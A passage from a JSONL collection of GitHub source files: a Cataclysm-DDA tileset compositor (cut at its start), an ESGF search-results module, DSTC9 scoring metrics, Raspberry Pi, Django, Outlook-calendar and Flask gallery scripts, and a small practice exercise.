True\n in_list.append(vips_image)\n for i in range(0, spacer):\n in_list.append(self.null_image)\n\n return in_list\n\n def walk_dirs(self, refs):\n tmp_merged_pngs = []\n for subdir_fpath, dirnames, filenames in os.walk(self.subdir_path):\n for filename in filenames:\n filepath = os.path.join(subdir_fpath, filename)\n if filename.endswith(\".png\"):\n pngname = filename.split(\".png\")[0]\n if (pngname in refs.pngname_to_pngnum or\n pngname == \"no_entry\"):\n print(\"skipping {}\".format(pngname))\n continue\n if self.filler and pngname in refs.pngname_to_pngnum:\n continue # TODO: option to warn\n self.row_pngs.append(filepath)\n refs.pngname_to_pngnum[pngname] = refs.pngnum\n refs.pngnum_to_pngname[refs.pngnum] = pngname\n refs.pngnum += 1\n if len(self.row_pngs) > 15:\n merged = self.merge_row(refs)\n self.row_num += 1\n self.row_pngs = []\n tmp_merged_pngs += merged\n elif filename.endswith(\".json\"):\n with open(filepath, \"r\") as fp:\n try:\n tile_entry = json.load(fp)\n except Exception:\n print(\"error loading {}\".format(filepath))\n raise\n\n if not isinstance(tile_entry, list):\n tile_entry = [tile_entry]\n self.tile_entries += tile_entry\n if self.row_pngs:\n if self.row_num == 0 and self.row_pngs == ['null_image']:\n return []\n merged = self.merge_row(refs)\n tmp_merged_pngs += merged\n return tmp_merged_pngs\n\n def create_sheet(self, merge_pngs):\n '''\n Compose and save tilesheet PNG\n '''\n if merge_pngs:\n out_image = Vips.Image.arrayjoin(merge_pngs, across=16)\n out_image.pngsave(self.output)\n\n\nif __name__ == '__main__':\n # read arguments and initialize objects\n arg_parser = argparse.ArgumentParser(description=__doc__)\n arg_parser.add_argument(\n 'source_dir',\n help='Tileset source files directory path')\n arg_parser.add_argument(\n 'output_dir', nargs='?',\n help='Output directory path')\n arg_parser.add_argument(\n '--use-all', dest='use_all', action='store_true',\n help='Add unused images with id being their basename')\n args_dict = vars(arg_parser.parse_args())\n\n source_dir = args_dict.get('source_dir')\n output_dir = args_dict.get('output_dir') or source_dir\n tileset_confpath = os.path.join(output_dir, 'tile_config.json')\n use_all = args_dict.get('use_all', False)\n\n refs = PngRefs(source_dir, output_dir)\n\n typed_ts_data = {\n \"main\": [],\n \"filler\": [],\n \"fallback\": [],\n }\n fallback_name = \"fallback.png\"\n\n # loop through 
tilesheets and parse all configs in subdirectories,\n    # composing each sheet's output image along the way\n    for subdir_index in range(1, len(refs.tileset_info)):\n        ts_data = TilesheetData(subdir_index, refs)\n        ts_data.set_first_index(refs)\n\n        if ts_data.filler:\n            ts_type = \"filler\"\n        elif ts_data.fallback:\n            ts_type = \"fallback\"\n        else:\n            ts_type = \"main\"\n\n        print(\"Info: parsing {} tilesheet {}\".format(\n            ts_type, ts_data.ts_name))\n        if ts_type != \"fallback\":\n            tmp_merged_pngs = ts_data.walk_dirs(refs)\n\n            if not tmp_merged_pngs:\n                # no images in the tilesheet, revert pngnum\n                refs.pngnum -= 1\n                continue\n\n            # write output PNGs\n            ts_data.create_sheet(tmp_merged_pngs)\n\n            ts_data.max_index = refs.pngnum\n\n        typed_ts_data[ts_type].append(ts_data)\n\n    # combine config data in correct order\n    all_ts_data = typed_ts_data[\"main\"] + typed_ts_data[\"filler\"] \\\n        + typed_ts_data[\"fallback\"]\n\n    # preparing \"tiles-new\", but remembering max index of each sheet in keys\n    tiles_new_dict = dict()\n\n    for ts_data in all_ts_data:\n        if ts_data.fallback:\n            fallback_name = ts_data.ts_name\n            continue\n        ts_tile_entries = []\n\n        for tile_entry in ts_data.tile_entries:\n            converted_tile_entry = refs.convert_tile_entry(\n                tile_entry, \"\", ts_data.filler)\n            if converted_tile_entry:\n                ts_tile_entries.append(converted_tile_entry)\n\n        ts_conf = {\n            \"file\": ts_data.ts_name,\n            \"tiles\": ts_tile_entries,\n            \"//\": \"range {} to {}\".format(\n                ts_data.first_index, ts_data.max_index)\n        }\n\n        if not ts_data.is_standard(refs):\n            ts_conf[\"sprite_width\"] = ts_data.width\n            ts_conf[\"sprite_height\"] = ts_data.height\n            ts_conf[\"sprite_offset_x\"] = ts_data.offset_x\n            ts_conf[\"sprite_offset_y\"] = ts_data.offset_y\n\n        tiles_new_dict[ts_data.max_index] = ts_conf\n\n    # find unused images\n    unused = refs.find_unused(use_all)\n\n    # unused list must be empty without use_all\n    for bare_png in unused:\n        bare_num = refs.pngname_to_pngnum[bare_png]\n        previous_max = 0\n        for ts_max_index in tiles_new_dict.keys():\n            if previous_max < bare_num < ts_max_index:\n                tiles_new_dict[ts_max_index]['tiles'].append(\n                    {'id': bare_png.split(\".png\")[0],\n                     'fg': bare_num})\n                break\n            previous_max = ts_max_index\n\n    # finalizing \"tiles-new\" config\n    tiles_new = [v for v in tiles_new_dict.values()]\n\n    FALLBACK[\"file\"] = fallback_name\n    tiles_new.append(FALLBACK)\n    conf_data = {\n        \"tile_info\": [{\n            \"width\": refs.tileset_width,\n            \"height\": refs.tileset_height\n        }],\n        \"tiles-new\": tiles_new\n    }\n\n    # save the config\n    write_to_json(tileset_confpath, conf_data)\n\n    if ERROR_LOGGED:\n        sys.exit(1)\n","repo_name":"AlexMooney/Cataclysm-DDA","sub_path":"tools/gfx_tools/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":17150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
+{"seq_id":"71068641747","text":"\"\"\"\n\nModule :mod:`pyesgf.search.results`\n===================================\n\nSearch results are retrieved through the :class:`ResultSet` class. This class\nhides paging of large result sets behind a client-side cache. Subclasses of\n:class:`Result` represent results of different SOLr record type.\n\n\"\"\"\n\nfrom collections import defaultdict\nfrom collections.abc import Sequence\nimport re\n\nfrom .consts import (DEFAULT_BATCH_SIZE, TYPE_DATASET, TYPE_FILE,\n                     TYPE_AGGREGATION)\n\n\nclass ResultSet(Sequence):\n    \"\"\"\n    :ivar context: The search context object used to generate this resultset\n    :property batch_size: The number of results that will be requested\n        from esgf-search as one call. 
This must be set on creation and\n cannot change.\n\n \"\"\"\n def __init__(self, context, batch_size=DEFAULT_BATCH_SIZE, eager=True):\n \"\"\"\n :param context: The search context object used to generate this\n resultset\n :param batch_size: The number of results that will be requested from\n esgf-search as one call.\n :param eager: Boolean specifying whether to retrieve the first batch on\n instantiation.\n \"\"\"\n self.context = context\n self.__batch_size = batch_size\n self.__batch_cache = {}\n self.__len_cache = None\n if eager:\n self.__get_batch(0)\n\n def __getitem__(self, index):\n batch_i = index // self.batch_size\n offset = index % self.batch_size\n batch = self.__get_batch(batch_i)\n\n search_type = self.context.search_type\n ResultClass = _result_classes[search_type]\n\n # !TODO: should probably wrap the json inside self.__batch_cache\n return ResultClass(batch[offset], self.context)\n\n def __len__(self):\n if self.__len_cache is None:\n self.__get_batch(0)\n return self.__len_cache\n\n @property\n def batch_size(self):\n return self.__batch_size\n\n def _build_result(self, result):\n \"\"\"\n Construct a result object from the raw json.\n\n This method is designed to be overridden in subclasses if desired.\n The default implementation simply returns the json.\n\n \"\"\"\n return result\n\n def __get_batch(self, batch_i):\n if batch_i in self.__batch_cache:\n return self.__batch_cache[batch_i]\n\n offset = self.batch_size * batch_i\n limit = self.batch_size\n\n query_dict = self.context._build_query()\n response = (self.context.connection\n .send_search(query_dict, limit=limit, offset=offset,\n shards=self.context.shards))\n\n if self.__len_cache is None:\n self.__len_cache = response['response']['numFound']\n\n # !TODO: strip out results\n batch = response['response']['docs']\n\n self.__batch_cache[batch_i] = batch\n return batch\n\n\nclass BaseResult(object):\n \"\"\"\n Base class for results.\n\n Subclasses represent different search types such as File and Dataset.\n\n :ivar json: The original json representation of the result.\n :ivar context: The SearchContext which generated this result.\n :property urls: a dictionary of the form\n ``{service: [(url, mime_type), ...], ...}``\n :property opendap_url: The url of an OPeNDAP endpoint for this result\n if available\n :property las_url: The url of an LAS endpoint for this result if available\n :property download_url: The url for downloading the result by HTTP\n if available\n :property gridftp_url: The url for downloading the result by Globus\n if available\n :property globus_url: The url for downloading the result by Globus\n if available (including endpoint)\n :property index_node: The index node from where the metadata is stored.\n Calls to ``*_context()`` will optimise queries to only address this node.\n\n \"\"\"\n def __init__(self, json, context):\n self.json = json\n self.context = context\n\n @property\n def urls(self):\n url_dict = defaultdict(list)\n for encoded in self.json['url']:\n url, mime_type, service = encoded.split('|')\n url_dict[service].append((url, mime_type))\n\n return url_dict\n\n @property\n def opendap_url(self):\n try:\n url, mime = self.urls['OPENDAP'][0]\n except (KeyError, IndexError):\n return None\n\n url = re.sub(r'.html$', '', url)\n\n return url\n\n @property\n def las_url(self):\n try:\n url, mime = self.urls['LAS'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def download_url(self):\n try:\n url, mime = self.urls['HTTPServer'][0]\n except 
(KeyError, IndexError):\n return None\n\n return url\n\n @property\n def gridftp_url(self):\n try:\n url, mime = self.urls['GridFTP'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def globus_url(self):\n try:\n url, mime = self.urls['Globus'][0]\n except (KeyError, IndexError):\n return None\n\n return url\n\n @property\n def index_node(self):\n try:\n index_node = self.json['index_node']\n except KeyError:\n return None\n\n return index_node\n\n\nclass DatasetResult(BaseResult):\n \"\"\"\n A result object for ESGF datasets.\n\n :property dataset_id: The solr dataset_id which is unique throughout the\n system.\n\n \"\"\"\n\n @property\n def dataset_id(self):\n # !TODO: should we decode this into a tuple?\n # self.json['id'].split('|')\n return self.json['id']\n\n @property\n def number_of_files(self):\n \"\"\"\n Returns file count as reported by the dataset record.\n \"\"\"\n return self.json['number_of_files']\n\n def file_context(self):\n \"\"\"\n Return a SearchContext for searching for files within this dataset.\n \"\"\"\n from .context import FileSearchContext\n\n if self.context.connection.distrib:\n # If the index node is in the available shards for this connection\n # then restrict shards to that node. Otherwise do nothing to\n # handle the case when the shard is replicated\n available_shards = list(self.context.connection.get_shard_list().keys())\n if self.index_node in available_shards:\n shards = [self.index_node]\n else:\n shards = None\n else:\n shards = None\n\n files_context = FileSearchContext(\n connection=self.context.connection,\n constraints={'dataset_id': self.dataset_id},\n shards=shards,\n )\n return files_context\n\n def aggregation_context(self):\n \"\"\"\n Return a SearchContext for searching for aggregations within this\n dataset.\n \"\"\"\n from .context import AggregationSearchContext\n\n if self.context.connection.distrib:\n # If the index node is in the available shards for this connection\n # then restrict shards to that node. Otherwise do nothing to\n # handle the case when the shard is replicated\n available_shards = list(self.context.connection.get_shard_list().keys())\n if self.index_node in available_shards:\n shards = [self.index_node]\n else:\n shards = None\n else:\n shards = None\n\n agg_context = AggregationSearchContext(\n connection=self.context.connection,\n constraints={'dataset_id': self.dataset_id},\n shards=shards,\n )\n return agg_context\n\n\nclass FileResult(BaseResult):\n \"\"\"\n A result object for ESGF files. Properties from :class:`BaseResult` are\n inherited.\n\n :property file_id: The identifier for the file\n :property checksum: The checksum of the file\n :property checksum_type: The algorithm used for generating the checksum\n :property filename: The filename\n :property size: The file size in bytes\n\n \"\"\"\n @property\n def file_id(self):\n return self.json['id']\n\n @property\n def checksum(self):\n try:\n return self.json['checksum'][0]\n except KeyError:\n return None\n\n @property\n def checksum_type(self):\n try:\n return self.json['checksum_type'][0]\n except KeyError:\n return None\n\n @property\n def filename(self):\n return self.json['title']\n\n @property\n def size(self):\n return int(self.json['size'])\n\n @property\n def tracking_id(self):\n try:\n return self.json['tracking_id'][0]\n except KeyError:\n return None\n\n\nclass AggregationResult(BaseResult):\n \"\"\"\n A result object for ESGF aggregations. 
Properties from :class:`BaseResult`\n are inherited.\n\n :property aggregation_id: The aggregation id\n \"\"\"\n @property\n def aggregation_id(self):\n return self.json['id']\n\n\n_result_classes = {\n TYPE_DATASET: DatasetResult,\n TYPE_FILE: FileResult,\n TYPE_AGGREGATION: AggregationResult,\n }\n","repo_name":"ESGF/esgf-pyclient","sub_path":"pyesgf/search/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":9480,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"39799939284","text":"from dataset_walker import DatasetWalker\n\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom nltk.translate.meteor_score import single_meteor_score\nfrom rouge import Rouge \n\nimport re\n\nimport sys\nimport json\nimport argparse\n\nRE_ART = re.compile(r'\\b(a|an|the)\\b')\nRE_PUNC = re.compile(r'[!\"#$%&()*+,-./:;<=>?@\\[\\]\\\\^`{|}~_\\']')\n\nclass Metric:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self._detection_tp = 0.0\n self._detection_fp = 0.0\n self._detection_tn = 0.0\n self._detection_fn = 0.0\n \n self._selection_mrr5 = 0.0\n self._selection_r1 = 0.0\n self._selection_r5 = 0.0\n\n self._generation_bleu1 = 0.0\n self._generation_bleu2 = 0.0\n self._generation_bleu3 = 0.0\n self._generation_bleu4 = 0.0\n self._generation_meteor = 0.0\n self._generation_rouge_1 = 0.0\n self._generation_rouge_2 = 0.0\n self._generation_rouge_l = 0.0\n\n def _match(self, ref_knowledge, pred_knowledge):\n result = []\n for pred in pred_knowledge:\n matched = False\n for ref in ref_knowledge:\n if pred['domain'] == ref['domain'] and pred['entity_id'] == ref['entity_id'] and pred['doc_id'] == ref['doc_id']:\n matched = True\n result.append(matched)\n return result\n \n def _reciprocal_rank(self, ref_knowledge, hyp_knowledge, k=5):\n relevance = self._match(ref_knowledge, hyp_knowledge)[:k]\n\n if True in relevance:\n idx = relevance.index(True)\n result = 1.0/(idx+1)\n else:\n result = 0.0\n\n return result\n\n def _recall_at_k(self, ref_knowledge, hyp_knowledge, k=5):\n relevance = self._match(ref_knowledge, hyp_knowledge)[:k]\n\n if True in relevance:\n result = 1.0\n else:\n result = 0.0\n\n return result\n\n def _normalize_text(self, text):\n result = text.lower()\n result = RE_PUNC.sub(' ', result)\n result = RE_ART.sub(' ', result)\n result = ' '.join(result.split())\n\n return result\n \n def _bleu(self, ref_response, hyp_response, n=4):\n ref_tokens = self._normalize_text(ref_response).split()\n hyp_tokens = self._normalize_text(hyp_response).split()\n\n weights = [1.0/n] * n\n \n score = sentence_bleu([ref_tokens], hyp_tokens, weights)\n\n return score\n\n def _meteor(self, ref_response, hyp_response):\n score = single_meteor_score(ref_response, hyp_response, self._normalize_text)\n\n return score\n\n def _rouge(self, ref_response, hyp_response, mode='l'):\n ref_response = self._normalize_text(ref_response)\n hyp_response = self._normalize_text(hyp_response)\n\n rouge = Rouge()\n\n if mode == 'l':\n score = rouge.get_scores(hyp_response, ref_response)[0]['rouge-l']['f']\n elif mode == 1:\n score = rouge.get_scores(hyp_response, ref_response)[0]['rouge-1']['f']\n elif mode == 2:\n score = rouge.get_scores(hyp_response, ref_response)[0]['rouge-2']['f']\n else:\n raise ValueError(\"unsupported mode: %s\" % mode)\n\n return score\n\n \n def update(self, ref_obj, hyp_obj):\n if ref_obj['target'] is True:\n if hyp_obj['target'] is True:\n self._detection_tp += 1\n \n self._selection_mrr5 += 
self._reciprocal_rank(ref_obj['knowledge'], hyp_obj['knowledge'], 5)\n self._selection_r1 += self._recall_at_k(ref_obj['knowledge'], hyp_obj['knowledge'], 1)\n self._selection_r5 += self._recall_at_k(ref_obj['knowledge'], hyp_obj['knowledge'], 5)\n\n self._generation_bleu1 += self._bleu(ref_obj['response'], hyp_obj['response'], 1)\n self._generation_bleu2 += self._bleu(ref_obj['response'], hyp_obj['response'], 2)\n self._generation_bleu3 += self._bleu(ref_obj['response'], hyp_obj['response'], 3)\n self._generation_bleu4 += self._bleu(ref_obj['response'], hyp_obj['response'], 4)\n self._generation_meteor += self._meteor(ref_obj['response'], hyp_obj['response'])\n self._generation_rouge_l += self._rouge(ref_obj['response'], hyp_obj['response'], 'l')\n self._generation_rouge_1 += self._rouge(ref_obj['response'], hyp_obj['response'], 1)\n self._generation_rouge_2 += self._rouge(ref_obj['response'], hyp_obj['response'], 2) \n else:\n self._detection_fn += 1\n else:\n if hyp_obj['target'] is True:\n self._detection_fp += 1\n else:\n self._detection_tn += 1\n\n def _compute(self, score_sum):\n if self._detection_tp + self._detection_fp > 0.0:\n score_p = score_sum/(self._detection_tp + self._detection_fp)\n else:\n score_p = 0.0\n\n if self._detection_tp + self._detection_fn > 0.0:\n score_r = score_sum/(self._detection_tp + self._detection_fn)\n else:\n score_r = 0.0\n\n if score_p + score_r > 0.0:\n score_f = 2*score_p*score_r/(score_p+score_r)\n else:\n score_f = 0.0\n\n return (score_p, score_r, score_f)\n \n def scores(self):\n detection_p, detection_r, detection_f = self._compute(self._detection_tp)\n \n selection_mrr5_p, selection_mrr5_r, selection_mrr5_f = self._compute(self._selection_mrr5)\n selection_r1_p, selection_r1_r, selection_r1_f = self._compute(self._selection_r1)\n selection_r5_p, selection_r5_r, selection_r5_f = self._compute(self._selection_r5)\n\n generation_bleu1_p, generation_bleu1_r, generation_bleu1_f = self._compute(self._generation_bleu1)\n generation_bleu2_p, generation_bleu2_r, generation_bleu2_f = self._compute(self._generation_bleu2)\n generation_bleu3_p, generation_bleu3_r, generation_bleu3_f = self._compute(self._generation_bleu3)\n generation_bleu4_p, generation_bleu4_r, generation_bleu4_f = self._compute(self._generation_bleu4)\n generation_meteor_p, generation_meteor_r, generation_meteor_f = self._compute(self._generation_meteor)\n generation_rouge_l_p, generation_rouge_l_r, generation_rouge_l_f = self._compute(self._generation_rouge_l)\n generation_rouge_1_p, generation_rouge_1_r, generation_rouge_1_f = self._compute(self._generation_rouge_1)\n generation_rouge_2_p, generation_rouge_2_r, generation_rouge_2_f = self._compute(self._generation_rouge_2)\n\n scores = {\n 'detection': {\n 'prec': detection_p,\n 'rec': detection_r,\n 'f1': detection_f\n },\n 'selection': {\n 'mrr@5': selection_mrr5_f,\n 'r@1': selection_r1_f,\n 'r@5': selection_r5_f,\n },\n 'generation': {\n 'bleu-1': generation_bleu1_f,\n 'bleu-2': generation_bleu2_f,\n 'bleu-3': generation_bleu3_f,\n 'bleu-4': generation_bleu4_f,\n 'meteor': generation_meteor_f,\n 'rouge_1': generation_rouge_1_f,\n 'rouge_2': generation_rouge_2_f,\n 'rouge_l': generation_rouge_l_f\n }\n }\n\n return scores\n \ndef main(argv):\n parser = argparse.ArgumentParser(description='Evaluate the system outputs.')\n\n parser.add_argument('--dataset', dest='dataset', action='store', metavar='DATASET', choices=['train', 'val', 'test'], required=True, help='The dataset to analyze')\n 
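# each prediction object is expected to mirror the labels, i.e. {'target': bool, 'knowledge': [...], 'response': str} (inferred from Metric.update above)\n    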
parser.add_argument('--dataroot',dest='dataroot',action='store', metavar='PATH', required=True,\n                        help='Will look for corpus in <dataroot>/<dataset>/...')\n    parser.add_argument('--outfile',dest='outfile',action='store',metavar='JSON_FILE',required=True,\n                        help='File containing output JSON')\n    parser.add_argument('--scorefile',dest='scorefile',action='store',metavar='JSON_FILE',required=True,\n                        help='File containing scores')\n\n    args = parser.parse_args()\n\n    with open(args.outfile, 'r') as f:\n        output = json.load(f)\n    \n    data = DatasetWalker(dataroot=args.dataroot, dataset=args.dataset, labels=True)\n\n    metric = Metric()\n\n    for (instance, ref), pred in zip(data, output):\n        metric.update(ref, pred)\n    \n    scores = metric.scores()\n\n    with open(args.scorefile, 'w') as out:\n        json.dump(scores, out, indent=2)\n    \n\nif __name__ == \"__main__\":\n    main(sys.argv) \n","repo_name":"alexa/alexa-with-dstc9-track1-dataset","sub_path":"scripts/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"48"}
+{"seq_id":"72275306067","text":"from datetime import datetime\nfrom picamera import PiCamera # it will work in raspi\ncam = PiCamera() # open the camera\n#cam.capture(current_time+'.jpg')\n#cam.close()\n\nimport time\n\nimport getch\nwhile True:\n    char = getch.getch()\n    key_val = ord(char)\n    print('key_val: ',key_val,' type: ',type(key_val))\n    now=datetime.now()\n    current_time = now.strftime(\"%H:%M:%S\")\n    if key_val == 46: # here works for . (dot)\n        print('printing time: ',current_time)\n        cam.capture(current_time+'.jpg')\n        print('capture done')\n\n    # print('I am doing job as the key val is: ',key_val)\n    else:\n        print('I have to quit as the key val is: ',key_val)\n        cam.close()\n        break","repo_name":"atifkarim/problem_solving","sub_path":"python_practise/capture_image_with_key_RasPI.py","file_name":"capture_image_with_key_RasPI.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"73824523345","text":"def max_in_list(ls):\n    largest = ls[0]\n    for x in ls:\n        if x>largest:\n            largest = x\n    return largest\ndef find_longest_word(a):\n    return max_in_list(a)\n\n#reads words\nlis = []\nn = int(input('Enter Number of elements in list:'))\nfor x in range(n):\n    lis.append(input('Enter Values:'))\n#lengths of words\nsize = []\nfor x in lis:\n    size.append(len(x))\nprint(list(zip(lis,size)))\nprint(find_longest_word(size))\n","repo_name":"arjun921/Python-TIL","sub_path":"misc/classPracticals/15LongestWord.py","file_name":"15LongestWord.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"25287160487","text":"\"\"\"WebMonitor URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.views.static import serve\n\nfrom rest_framework_jwt.views import obtain_jwt_token\nfrom WebMonitor import settings\n\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('api_auth/', include('rest_framework.urls', namespace='rest_framework')),\n    # media config: together with MEDIA_ROOT in settings, this lets the media folder and its files be accessed from the browser address bar\n    re_path(r'media/(?P<path>.*)$',serve,{'document_root':settings.MEDIA_ROOT}),\n]\n\n# drf_yasg ---------------------------------------\n# every API url that should appear on the interactive docs page is listed here\nschema_url_patterns =[\n    path('login/', obtain_jwt_token), # JWT login/authentication endpoint http://127.0.0.1:8000/login/\n    path('users/', include('apps.users.urls', namespace=\"users\")), # users/\n    path('monitor/', include('apps.monitor.urls', namespace=\"monitor\")), # monitor/\n    path('alarm/', include('apps.alarm.urls', namespace=\"alarm\")), # alarm/\n    path('flight/', include('apps.flight.urls', namespace=\"flight\")), # flight/\n    path('task/', include('apps.task.urls', namespace=\"task\")), # task/\n]\n\nurlpatterns += schema_url_patterns\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n    openapi.Info(\n        title=\"机场人员流动监测系统 API\",\n        default_version='v1',\n        description=\"机场人员流动监测系统数据接口页面 \\n 用户信息管理、日志管理、数据监测、场景管理、权限管理等\",\n        terms_of_service=\"http://www.briup.com\",\n        contact=openapi.Contact(email=\"chengzy@briup.com\"),\n        license=openapi.License(name=\"BSD License\"),\n    ),\n    public=False,\n    permission_classes=(permissions.AllowAny,),\n    patterns= schema_url_patterns\n)\n\n# http://127.0.0.1:8000/swagger/\nurlpatterns += [\n    # path('swagger(?P<format>\.json|\.yaml)', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n    path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n    path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n]\n","repo_name":"CSUliver/InternProject","sub_path":"WebMonitor/WebMonitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"7079949289","text":"from utils import prtWarning, prtInfo\r\n\r\nMISSION_SPENT_TIME_STR = \"mission_spent_time\"\r\nTOTAL_STR = \"total\"\r\nUNKNOWN_CATEGORY_STR = \"UNKNOWN_CATEGORY\"\r\nDATES_STR = \"dates\"\r\n\r\n\r\nclass DataModel:\r\n    \"\"\"\r\n    This class represents the Data Model of the Outlook events\r\n    \"\"\"\r\n\r\n    def __init__(self, events):\r\n        self.events = events\r\n        self.time_per_mission = {}\r\n        self.ratio_per_mission = {}\r\n\r\n    def show_events(self):\r\n        prtInfo(\"\\n*** Events fetched ***\")\r\n        for idx, event in enumerate(self.events):\r\n            print(f\"Event[{idx}] : {event}\")\r\n            if len(event.categories) == 0:\r\n                category = UNKNOWN_CATEGORY_STR\r\n            else:\r\n                category = event.categories[0]\r\n            print(f\"\\tCategory : {category}\")\r\n            print(f\"\\tSpent time : {self.diff_time_spent(event)}\")\r\n\r\n    def show_time_per_mission(self):\r\n        prtInfo(\"\\n*** Time per mission table ***\")\r\n        for day, value in self.time_per_mission.items():\r\n            print(f\"* Day {day} - Total in hours ({value[TOTAL_STR]}) :\")\r\n            for mission, time_spent in value[MISSION_SPENT_TIME_STR].items():\r\n                print(f\"\\t* Mission '{mission}' - Time spent in hours : {time_spent}\")\r\n\r\n    def show_ratio_per_mission(self):\r\n        
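# print the ratio-per-mission table computed by compute_ratios()\r\n        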
prtInfo(\"\\n*** Ratio per mission table ***\")\r\n for mission, value in self.ratio_per_mission.items():\r\n print(f\"* Mission {mission} - Total in hours ({value[TOTAL_STR]}) :\")\r\n for date, ratio in value[DATES_STR].items():\r\n print(f\"\\t* Date '{date}' - Time spent in hours : {ratio}\")\r\n\r\n def sort_events(self) -> list:\r\n\r\n if not self.events:\r\n prtWarning(\"Events list empty.\")\r\n else:\r\n sorted_events = []\r\n for event in self.events:\r\n sorted_events.append(event)\r\n sorted_events.sort(key=lambda x: x.start)\r\n\r\n self.events = sorted_events\r\n\r\n return self.events\r\n\r\n def compute_time_spent(self) -> dict:\r\n \"\"\" Compute the mission ratios per day\r\n\r\n :return:\r\n Ex :\r\n { \"1\" : { \"mission_spent_time\" : {\"MissionX\" : 2, \"MissionY\" : 2}, \"Total\" : 4 } },\r\n \"2\" : : { \"MissionX\" : 4}, \"Total\" : 4 } }\r\n }\r\n \"\"\"\r\n tpm = self.time_per_mission\r\n for event in self.events:\r\n day = event.start.strftime(\"%d/%m/%y\")\r\n day = str(day)\r\n if len(event.categories) == 0:\r\n category = UNKNOWN_CATEGORY_STR\r\n else:\r\n category = event.categories[0]\r\n time_spent = self.diff_time_spent(event)\r\n if day in tpm:\r\n if category in tpm[day][MISSION_SPENT_TIME_STR]:\r\n self.time_per_mission[day][MISSION_SPENT_TIME_STR][category] += time_spent\r\n self.time_per_mission[day][TOTAL_STR] += time_spent\r\n else:\r\n self.time_per_mission[day][MISSION_SPENT_TIME_STR][category] = time_spent\r\n self.time_per_mission[day][TOTAL_STR] += time_spent\r\n else:\r\n tpm[day] = {MISSION_SPENT_TIME_STR: {category: time_spent}, TOTAL_STR: time_spent}\r\n\r\n return tpm\r\n\r\n def compute_ratios(self) -> dict:\r\n\r\n tpm = self.time_per_mission\r\n rpm = self.ratio_per_mission\r\n for day in tpm.keys():\r\n for mission_key, mission_value in tpm[day][MISSION_SPENT_TIME_STR].items():\r\n ratio = mission_value / tpm[day][TOTAL_STR]\r\n if mission_key in rpm.keys():\r\n rpm[mission_key][DATES_STR][day] = ratio\r\n rpm[mission_key][TOTAL_STR] += ratio\r\n else:\r\n rpm[mission_key] = {DATES_STR: {day: ratio}, TOTAL_STR: ratio}\r\n\r\n return rpm\r\n\r\n @staticmethod\r\n def diff_time_spent(event) -> int:\r\n time_spent = event.end - event.start\r\n return time_spent.seconds / 3600\r\n","repo_name":"LaurentMesguen/Orcaro","sub_path":"data_model.py","file_name":"data_model.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10574740940","text":"from flask import Flask, render_template, url_for\nfrom vacations import fetch_vacations_items\n\nvacation_folders = fetch_vacations_items()\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home_route():\n return render_template('index.html', rows=vacation_folders)\n\n\n@app.route('/view_gallery/')\ndef view_gallery(name, folder):\n import glob # fetching photos from correct folder\n import re # regular expressions\n pathname = \"static/images/{x}/*\".format(x=folder)\n globbed_photos = glob.glob(pathname)\n\n final_photos = []\n for pic in globbed_photos:\n x = re.split(\"/\", pic)\n path = \"{images_folder}/{vac_name}/{img}\".format(images_folder=x[1], vac_name=x[2], img=x[3])\n image_file = url_for('static', filename=path)\n final_photos.append(image_file)\n\n return render_template('photo_gallery.html', name=name, photos=final_photos)\n\n\nif __name__ == '__main__':\n 
app.run(debug=True)","repo_name":"leeb2828/vacation-photo-gallery","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
